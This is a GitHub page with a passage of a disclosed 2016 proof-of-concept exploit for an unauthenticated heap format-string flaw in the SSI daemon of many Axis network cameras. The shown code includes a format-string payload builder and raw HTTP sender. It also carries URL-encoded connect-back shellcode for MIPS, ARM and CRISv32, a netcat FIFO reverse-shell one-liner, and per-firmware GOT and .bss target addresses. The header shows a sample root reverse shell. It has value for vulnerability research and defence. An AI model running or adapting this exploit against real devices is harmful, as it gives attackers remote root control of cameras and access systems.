-
Notifications
You must be signed in to change notification settings - Fork 302
/
axis-ssid-PoC.py
1730 lines (1533 loc) · 53.1 KB
/
axis-ssid-PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/usr/bin/env python2.7
#
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
# Research and development by bashis <mcw noemail eu> 2016
#
# This format string vulnerability has following characteristic:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output the remote attacker)(*)
# - Remotly exploitable (As anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
#
# This exploit has following characteristic:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
# - "One-Write-Where-And-What" for MIPS and CRISv32
# Using "Old Style" POP's
# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
# - "Two-Write-Where-And-What" for ARM
# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address
# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write
# [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually]
# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>
# <BODY><H1>500 Server Error</H1>
# The server encountered an internal error and could not complete your request.
# </BODY></HTML>
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10
# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.
# ---
#
# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1. Direct addressing with %<argument>$%n is "delayed", and comes in force only after disconnect.
# Old metod with POP's coming into force instantly
#
# 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)
# - Would be interesting to investigate why.
#
# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26
# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4. Everything is randomized, except heap.
#
# 5. My initial attempts to use ROP's was not good, as I didn't want to create
# one unique FMS key by testing each single firmware version, and using ROP with FMS
# on heap seems pretty complicated as there is one jump availible, maximum two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.
#
# 6. Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS excecuted on heap
#
# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
# so execute shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,
# and re-compile of the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
#
# 8. This exploit are pretty well documented, more details can be extracted by reading
# the code and comments.
#
# MIPS ssid maps
# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid
# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid
# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]
#
# ARM ssid maps
# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid
# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid
# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]
#
# Crisv32 ssid maps
# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid
# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid
# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]
#
# General notes:
#
# When the vul daemon process is exploited, and after popping root connect-back shell,
# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,
# when the main process are fully alive again, I can enjoy the shell, and everybody else can
# enjoy of the camera - that should make all of us happy ;)
# During exploiting, logs says almost nothing, only that the main process restarted.
# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)
#
# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),
# after ssid cannot verify the user, free() are the closest function to be called after
# vsyslog(), needed and perfect to use for jumping.
# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.
# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.
#
# Quite surprised to see so many different devices and under one major release version,
# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version.
#
# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor,
# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password.
#
# - No hardcoded login/password that could easily be found in firmware/software files.
# - Extremely hard to find without local access (and find out what to trigger for opening the door)
# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version."
# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)
#
# Note:
# I don't say that Axis Communication has made this hidden format string by this purpose.
# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon,
# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().
#
# Vulnerable and exploitable products
#
# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,
# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,
# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,
# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,
# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,
# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,
# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,
# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,
# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,
# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,
# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,
# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,
# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,
# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,
# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,
# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more
#
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
#
# Firmware versions vulnerable to the SSI FMS exploit
#
# ('V.Vx' == The FMS key used in this exploit)
#
# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x)
# 5.00.x 2008 - - no
# 5.01.x 2008 no - no
# 5.02.x 2008 no - -
# 5.05.x 2009 no - -
# 5.06.x 2009 no - -
# 5.07.x 2009 no - no
# 5.08.x 2010 no - -
# 5.09.x 2010 no - -
# 5.10.x 2009 no - -
# 5.11.x 2010 no - -
# 5.12.x 2010 no - -
# 5.15.x 2010 no - -
# 5.16.x 2010 no - -
# 5.20.x 2010-2011 5.2x - 5.2x
# 5.21.x 2011 5.2x - 5.2x
# 5.22.x 2011 5.2x - -
# 5.25.x 2011 5.2x - -
# 5.40.x 2011 5.4x 5.4x 5.4x
# 5.41.x 2012 5.4x - -
# 5.50.x 2013 5.5x 5.5x 5.4x
# 5.51.x 2013 - 5.4x -
# 5.55.x 2013 - 5.5x 5.5x
# 5.60.x 2014 - 5.6x 5.6x
# 5.65.x 2014-2015 - 5.6x -
# 5.70.x 2015 - 5.7x -
# 5.75.x 2015 - 5.7x 5.7x
# 5.80.x 2015 - 5.8x 5.8x
# 5.81.x 2015 - 5.8x -
# 5.85.x 2015 - 5.8x 5.8x
# 5.90.x 2015 - 5.9x -
# 5.95.x 2016 - 5.9x 5.8x
# 6.10.x 2016 - 6.1x -
# 6.15.x 2016 - - 6.1x
# 6.20.x 2016 - 6.2x -
#
# Vendor URL's of still supported and affected products
#
# http://www.axis.com/global/en/products/access-control
# http://www.axis.com/global/en/products/video-encoders
# http://www.axis.com/global/en/products/network-cameras
# http://www.axis.com/global/en/products/audio
#
# Axis Product Security
#
# http://www.axis.com/global/en/support/product-security
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
# http://www.axis.com/global/en/support/faq/FAQ116268
#
# Timetable
#
# - Research and Development: 06/01/2016 - 01/06/2016
# - Sent vulnerability details to vendor: 05/06/2016
# - Vendor responce received: 06/06/2016
# - Vendor ACK of findings received: 07/06/2016
# - Vendor sent verification image: 13/06/2016
# - Confirmed that exploit do not work after vendors correction: 13/06/2016
# - Vendor informed about their service release(s): 29/06/2016
# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016
# - Full Disclosure: 18/07/2016
#
# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>"
#
# Have a nice day
# /bashis
#
#####################################################################################
import sys
import string
import socket
import time
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import re
class do_FMS:
# POP = "%8x" # Old style POP's with 8 bytes per POP
POP = "%1c" # Old style POP's with 1 byte per POP
WRITElln = "%lln" # Write 8 bytes
WRITEn = "%n" # Write 4 bytes
WRITEhn = "%hn" # Write 2 bytes
WRITEhhn = "%hhn" # Write 1 byte
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
self.fmscode = ""
# Mostly used internally in this function
def Add(self, data):
self.fmscode += data
# 'New Style' Double word (8 bytes)
def AddDirectParameterLLN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$lln')
# 'New Style' Word (4 bytes)
def AddDirectParameterN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$n')
# 'New Style' Half word (2 bytes)
def AddDirectParameterHN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$hn')
# 'New Style' One Byte (1 byte)
def AddDirectParameterHHN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$hhn')
# Addressing
def AddADDR(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('u')
# 'Old Style' POP
def AddPOP(self, size):
if size != 0:
self.Add(self.POP * size)
# Normally only one will be sent, multiple is good to quick-check for any FMS
#
# 'Old Style' Double word (8 bytes)
def AddWRITElln(self, size):
self.Add(self.WRITElln * size)
# 'Old Style' Word (4 bytes)
def AddWRITEn(self, size):
self.Add(self.WRITEn * size)
# 'Old Style' Half word (2 bytes)
def AddWRITEhn(self, size):
self.Add(self.WRITEhn * size)
# 'Old Style' One byte (1 byte)
def AddWRITEhhn(self, size):
self.Add(self.WRITEhhn * size)
# Return the whole FMS string
def FMSbuild(self):
return self.fmscode
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, noexploit):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.noexploit = noexploit
# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc..
def RAW(self, uri):
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tmp = self.host.split(':')
HOST = tmp[0]
PORT = int(tmp[1])
if self.verbose:
print "[Verbose] Sending to:", HOST
print "[Verbose] Port:", PORT
print "[Verbose] URI:",uri
s.connect((HOST, PORT))
s.send("GET %s HTTP/1.0\r\n\r\n" % uri)
html = (s.recv(4096)) # We really do not care whats coming back
# if html:
# print "[i] Received:",html
s.shutdown(3)
s.close()
return html
def Send(self, uri):
# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually
# matter for the functionality of this exploit, only for future references.
headers = {
'User-Agent' : 'MSIE',
}
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
url = '%s://%s%s' % (self.proto, self.host, uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Default Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
else:
data = None
req = urllib2.Request(url, data, headers)
rsp = urllib2.urlopen(req)
if rsp:
print "[<] %s OK" % rsp.code
html = rsp.read()
return html
class shellcode_db:
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
def sc(self,target):
self.target = target
# Connect back shellcode
#
# CRISv32: Written by myself, no shellcode availible out on "The Internet"
# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators
# MIPSel: Written by Jacob Holcomb (url encoded by me)
# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php
#
# Slightly modified syscall's
MIPSel = string.join([
#close stdin
"%ff%ff%04%28" #slti a0,zero,-1
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
#close stdout
"%11%11%04%28" #slti a0,zero,4369
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
#close stderr
"%fd%ff%0c%24" #li t4,-3
"%27%20%80%01" #nor a0,t4,zero
"%a6%0f%02%24" #li v0,4006
"%4c%f7%f7%03" #syscall 0xdfdfd
# socket AF_INET (2)
"%fd%ff%0c%24" #li t4,-3
"%27%20%80%01" #nor a0,t4,zero
"%27%28%80%01" #nor a1,t4,zero
"%ff%ff%06%28" #slti a2,zero,-1
"%57%10%02%24" #li v0,4183
"%4c%f7%f7%03" #syscall 0xdfdfd
#
"%ff%ff%44%30" # andi $a0, $v0, 0xFFFF
#
# dup2 stdout
"%c9%0f%02%24" #li v0,4041
"%4c%f7%f7%03" #syscall 0xdfdfd
#
# dup2 stderr
"%c9%0f%02%24" #li v0,4041
"%4c%f7%f7%03" #syscall 0xdfdfd
#
# Port
"PP1PP0%05%3c"
"%01%ff%a5%34"
#
"%01%01%a5%20" #addi a1,a1,257
"%f8%ff%a5%af" #sw a1,-8(sp)
#
# IP
"IP3IP4%05%3c"
"IP1IP2%a5%34"
#
"%fc%ff%a5%af" #sw a1,-4(sp)
"%f8%ff%a5%23" #addi a1,sp,-8
"%ef%ff%0c%24" #li t4,-17
"%27%30%80%01" #nor a2,t4,zero
"%4a%10%02%24" #li v0,4170
"%4c%f7%f7%03" #syscall 0xdfdfd
#
"%62%69%08%3c" #lui t0,0x6962
"%2f%2f%08%35" #ori t0,t0,0x2f2f
"%ec%ff%a8%af" #sw t0,-20(sp)
"%73%68%08%3c" #lui t0,0x6873
"%6e%2f%08%35" #ori t0,t0,0x2f6e
"%f0%ff%a8%af" #sw t0,-16(sp
"%ff%ff%07%28" #slti a3,zero,-1
"%f4%ff%a7%af" #sw a3,-12(sp)
"%fc%ff%a7%af" #sw a3,-4(sp
"%ec%ff%a4%23" #addi a0,sp,-20
"%ec%ff%a8%23" #addi t0,sp,-20
"%f8%ff%a8%af" #sw t0,-8(sp)
"%f8%ff%a5%23" #addi a1,sp,-8
"%ec%ff%bd%27" #addiu sp,sp,-20
"%ff%ff%06%28" #slti a2,zero,-1
"%ab%0f%02%24" #li v0,4011 (execve)
"%4c%f7%f7%03" #syscall 0xdfdfd
], '')
# Working netcat shell
# - $PATH will locate 'mkfifo', 'nc' and 'rm'
# - LHOST / LPORT will be changed on the fly later in the code
# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting
# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]
# $ echo -n "$IFS" | hexdump -C
# 00000000 20 09 0a
# - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c]
#
# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator
#
# Working with Apache and Boa
# NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1"
NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1"
ARMel = string.join([
# original: http://shell-storm.org/shellcode/files/shellcode-754.php
# 32-bit instructions, enter thumb mode
"%01%10%8f%e2" # add r1, pc, #1
"%11%ff%2f%e1" # bx r1
# 16-bit thumb instructions follow
#
# socket(2, 1, 0)
"%02%20" #mov r0, #2
"%01%21" #mov r1, #1
"%92%1a" #sub r2, r2, r2
"%0f%02" #lsl r7, r1, #8
"%19%37" #add r7, r7, #25
"%01%df" #svc 1
#
# connect(r0, &addr, 16)
"%06%1c" #mov r6, r0
"%08%a1" #add r1, pc, #32
"%10%22" #mov r2, #16
"%02%37" #add r7, #2
"%01%df" #svc 1
#
# dup2(r0, 0/1/2)
"%3f%27" #mov r7, #63
"%02%21" #mov r1, #2
#
#lb:
"%30%1c" #mov r0, r6
"%01%df" #svc 1
"%01%39" #sub r1, #1
"%fb%d5" #bpl lb
#
# execve("/bin/sh", ["/bin/sh", 0], 0)
"%05%a0" #add r0, pc, #20
"%92%1a" #sub r2, r2, r2
"%05%b4" #push {r0, r2}
"%69%46" #mov r1, sp
"%0b%27" #mov r7, #11
"%01%df" #svc 1
#
"%c0%46" # .align 2 (NOP)
"%02%00" # .short 0x2 (struct sockaddr)
"PP1PP0" # .short 0x3412 (port: 0x1234)
"IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1)
# .ascii "/bin/sh\0\0"
"%2f%62%69%6e" # /bin
"%2f%73%68%00%00" # /sh\x00\x00
"%00%00%00%00"
"%c0%46"
], '')
# Connect-back shell for Axis CRISv32
# Written by mcw noemail eu 2016
#
CRISv32 = string.join([
#close(0)
"%7a%86" # clear.d r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#close(1)
"%41%a2" # moveq 1,r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#close(2)
"%42%a2" # moveq 2,r10
"%5f%9c%06%00" # movu.w 0x6,r9
"%3d%e9" # break 13
#
"%10%e1" # addoq 16,sp,acr
"%42%92" # moveq 2,r9
"%df%9b" # move.w r9,[acr]
"%10%e1" # addoq 16,sp,acr
"%02%f2" # addq 2,acr
#PORT
"%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 #
"%df%9b" # move.w r9,[acr]
"%10%e1" # addoq 16,sp,acr
"%6f%96" # move.d acr,r9
"%04%92" # addq 4,r9
#IP
"%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr
"%e9%fb" # move.d acr,[r9]
#
#socket()
"%42%a2" # moveq 2,r10
"%41%b2" # moveq 1,r11
"%7c%86" # clear.d r12
"%6e%96" # move.d $sp,$r9
"%e9%af" # move.d $r10,[$r9+]
"%e9%bf" # move.d $r11,[$r9+]
"%e9%cf" # move.d $r12,[$r9+]
"%41%a2" # moveq 1,$r10
"%6e%b6" # move.d $sp,$r11
"%5f%9c%66%00" # movu.w 0x66,$r9
"%3d%e9" # break 13
#
"%6a%96" # move.d $r10,$r9
"%0c%e1" # addoq 12,$sp,$acr
"%ef%9b" # move.d $r9,[$acr]
"%0c%e1" # addoq 12,$sp,$acr
"%6e%96" # move.d $sp,$r9
"%10%92" # addq 16,$r9
"%6f%aa" # move.d [$acr],$r10
"%69%b6" # move.d $r9,$r11
"%50%c2" # moveq 16,$r12
#
# connect()
"%6e%96" # move.d $sp,$r9
"%e9%af" # move.d $r10,[$r9+]
"%e9%bf" # move.d $r11,[$r9+]
"%e9%cf" # move.d $r12,[$r9+]
"%43%a2" # moveq 3,$r10
"%6e%b6" # move.d $sp,$r11
"%5f%9c%66%00" # movu.w 0x66,$r9
"%3d%e9" # break 13
# dup(0) already in socket
#dup(1)
"%6f%aa" # move.d [$acr],$r10
"%41%b2" # moveq 1,$r11
"%5f%9c%3f%00" # movu.w 0x3f,$r9
"%3d%e9" # break 13
#
#dup(2)
"%6f%aa" # move.d [$acr],$r10
"%42%b2" # moveq 2,$r11
"%5f%9c%3f%00" # movu.w 0x3f,$r9
"%3d%e9" # break 13
#
#execve("/bin/sh",NULL,NULL)
"%90%e2" # subq 16,$sp
"%6e%96" # move.d $sp,$r9
"%6e%a6" # move.d $sp,$10
"%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0
"%e9%0b" # move.d $r0,[$r9]
"%04%92" # addq 4,$r9
"%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0
"%e9%0b" # move.d $r0,[$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%04%92" # addq 4,$r9
"%e9%ab" # move.d $r10,[$r9]
"%04%92" # addq 4,$r9
"%79%8a" # clear.d [$r9]
"%10%e2" # addq 16,$sp
"%6e%f6" # move.d $sp,$acr
"%6e%96" # move.d $sp,$r9
"%6e%b6" # move.d $sp,$r11
"%7c%86" # clear.d $r12
"%4b%92" # moveq 11,$r9
"%3d%e9" # break 13
], '')
if self.target == 'MIPSel':
return MIPSel
elif self.target == 'ARMel':
return ARMel
elif self.target == 'CRISv32':
return CRISv32
elif self.target == 'NCSH1':
return NCSH
elif self.target == 'NCSH2':
return NCSH
else:
print "[!] Unknown shellcode! (%s)" % str(self.target)
sys.exit(1)
class FMSdb:
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
def FMSkey(self,target):
self.target = target
target_db = {
#-----------------------------------------------------------------------
# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)
#-----------------------------------------------------------------------
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'MIPS-5.85.x': [
0x41f370, # Adjust to GOT free() address
0x420900, # .bss shellcode address
2, # 1st POP's
2, # 2nd POP's
'axi', # Aligns injected code
700, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.40.3': [
0x41e41c, # Adjust to GOT free() address
0x4208cc, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'ax', # Aligns injected code
450, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.4x': [
0x41e4cc, # Adjust to GOT free() address
0x42097c, # .bss shellcode address
7, # 1st POP's
11, # 2nd POP's
'ax', # Aligns injected code
450, # How big buffer before shellcode
'MIPSel' # Shellcode type
],
# MPQT
'MIPS-5.5x': [
